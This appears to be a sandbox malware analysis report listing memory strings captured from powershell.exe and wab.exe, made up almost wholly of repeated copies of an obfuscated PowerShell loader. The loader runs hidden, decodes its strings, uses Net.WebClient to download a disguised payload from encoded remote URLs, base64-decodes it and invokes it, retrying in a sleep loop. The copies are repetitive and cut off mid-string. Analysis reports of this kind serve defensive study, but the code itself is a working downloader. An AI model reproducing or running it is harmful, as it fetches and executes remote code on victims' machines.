Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:O
              Source: powershell.exe, 00000002.00000002.2357862558.0000020B5A9B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361180627.0000020B5C460000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: powershell.exe-windowstylehiddenIf (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe
              Source: wab.exe, 0000000A.00000002.4222367203.0000000007252000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi: CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ') ;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes ' U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne nmBo. vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle ,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li ee VrI n ie .smo)Al ');Sloshily $Rumsterede;
              Source: powershell.exe, 00000005.00000002.2202717320.0000000007397000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Process7860Win32_Processpowershell.exepowershell.exepowershell.exeWin32_ComputerSystemuser-PCWin32_OperatingSystem10.0.19045Microsoft Windows 10 Pro|C:\Windows|\Device\Harddisk0\Partition320240828120116.301492+000C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Slosh
              Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
              Source: powershell.exe, 00000002.00000002.2485251498.0000020B74913000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: powershell.exe-windowstylehiddenIf (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe
              Source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(
